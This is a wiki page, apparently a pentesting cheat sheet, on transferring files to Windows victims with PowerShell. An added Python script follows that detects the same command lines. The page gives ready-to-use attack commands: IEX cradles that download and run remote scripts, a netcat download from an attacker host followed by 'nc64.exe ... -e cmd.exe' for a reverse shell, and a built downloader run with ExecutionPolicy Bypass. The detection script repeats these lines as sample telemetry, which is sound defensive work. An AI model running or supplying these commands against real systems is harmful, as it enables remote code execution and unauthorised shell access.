File transfer PowerShell

lethanhtung01011980 edited this page Apr 23, 2020 · 14 revisions

Goals

  • For Win7, 2008 and above
  • Support PowerShell

Method 1 - Single command

Normally used for remote execution

  • Download a file to an exact folder: powershell.exe (New-Object System.Net.WebClient).DownloadFile('https://example.com/archive.zip', 'C:\Windows\Temp\archive.zip')
  • Download and execute a script in memory: powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://<script>')"
  • PowerShell full path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe or C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe
  • URL-encoded form for use in a web request: C%3a\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe+IEX(New-Object+Net.Webclient).downloadString('http%3a//10.10.14.15/Invoke-PowerShellTcp.ps1')

If already in a PowerShell prompt

  • Run: IEX(New-Object Net.WebClient).downloadString('http://<script>')

Method 2

On the victim PC

  • powershell "wget http://attacker_ip/nc64.exe -OutFile nc64.exe"
  • nc64.exe attacker-ip <PORT> -e cmd.exe

Method 3

On the attacker PC

To create the file "wget.ps1" that will be run on the victim PC

  • echo $storageDir = $pwd > wget.ps1
  • echo $webclient = New-Object System.Net.WebClient >>wget.ps1
  • echo $url = "http://attacker_ip/nc.exe" >>wget.ps1
  • echo $file = "new-exploit.exe" >>wget.ps1
  • echo $webclient.DownloadFile($url,$file) >>wget.ps1

On the victim PC

To run the script and download the file

  • powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

Copy and paste into a non-interactive remote shell

  • Copy the content of the above file into the non-interactive remote shell
  • Execute it to download the file
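From the defender's side, the command lines in all three methods above share a handful of recognisable markers (WebClient DownloadString/DownloadFile, IEX, a wget alias with -OutFile, -ExecutionPolicy Bypass, nc -e cmd.exe, and the Sysnative path, including the URL-encoded variant). The following Python is an added example, not part of the original page, that flags those markers in process-creation command lines; the rule names, the sample telemetry and the 192.0.2.10 address are constructed for illustration.

```python
"""Added defensive example: flag the PowerShell download-cradle and netcat command
lines shown on this page in process-creation telemetry (for example the command-line
field of Sysmon Event ID 1 or Security Event ID 4688). All samples are constructed."""
import re
from urllib.parse import unquote

# One detection rule per technique on the page. Rules are applied case-insensitively
# to the normalised command line so the '+' / %3a web-URL variant is caught too.
RULES = [
    ("webclient_download",
     re.compile(r"New-Object\s+(System\.)?Net\.WebClient.*?\.Download(String|File)\(", re.I)),
    ("iex_cradle", re.compile(r"\b(IEX|Invoke-Expression)\b", re.I)),
    ("wget_alias_outfile", re.compile(r"\b(wget|curl|iwr|Invoke-WebRequest)\b.*-OutFile\b", re.I)),
    ("execution_policy_bypass", re.compile(r"-ExecutionPolicy\s+Bypass\b", re.I)),
    ("netcat_exec_shell", re.compile(r"\bnc(64)?(\.exe)?\b.*\s-e\s+cmd(\.exe)?\b", re.I)),
    ("sysnative_powershell", re.compile(r"Sysnative\\WindowsPowerShell", re.I)),
]


def normalize(cmdline: str) -> str:
    """URL-decode and turn '+' into spaces so encoded variants match the plain rules."""
    return unquote(cmdline.replace("+", " "))


def classify(cmdline: str) -> list[str]:
    """Return the names of every rule that fires on a single command line."""
    text = normalize(cmdline)
    return [name for name, rx in RULES if rx.search(text)]


def scan(cmdlines: list[str]) -> dict[str, list[str]]:
    """Map each flagged command line to the rules it triggered; benign lines are omitted."""
    return {line: hits for line in cmdlines if (hits := classify(line))}


# Constructed sample telemetry: the page's methods plus benign administrative noise.
SAMPLES = [
    r"powershell.exe (New-Object System.Net.WebClient).DownloadFile('https://example.com/archive.zip', 'C:\Windows\Temp\archive.zip')",
    r"C%3a\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe+IEX(New-Object+Net.Webclient).downloadString('http%3a//192.0.2.10/script.ps1')",
    r'powershell "wget http://192.0.2.10/nc64.exe -OutFile nc64.exe"',
    r"nc64.exe 192.0.2.10 4444 -e cmd.exe",
    r"powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1",
    r"powershell.exe -NoProfile -Command Get-Service",  # benign
    r"C:\Windows\System32\svchost.exe -k netsvcs",      # benign
]

if __name__ == "__main__":
    for line, hits in scan(SAMPLES).items():
        print(f"{', '.join(hits):45} {line}")
```

Each rule is deliberately narrow; in production the same markers would be one input to a broader scoring of PowerShell process trees rather than a standalone alert.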
